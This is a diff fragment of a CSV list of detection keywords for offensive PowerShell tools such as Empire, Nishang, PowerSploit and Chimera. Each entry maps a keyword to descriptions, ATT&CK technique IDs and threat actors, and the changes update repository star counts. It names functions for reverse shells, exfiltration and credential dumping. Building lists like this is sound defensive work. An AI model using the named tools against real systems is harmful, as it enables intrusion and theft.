T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PortScan*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-Portscan*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-PortScan*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-Portscan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PortScan*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Portscan*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Portscan.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-Portscan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PoshRatHttp*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PoshRatHttp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PoshRatHttps*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Portscan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PoshRatHttps*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PowerDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" -"*Invoke-PowerShellHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-PowerShellIcmp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellIcmp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PowerShellIcmp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellIcmp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellTcp*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PowerShellTcp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - 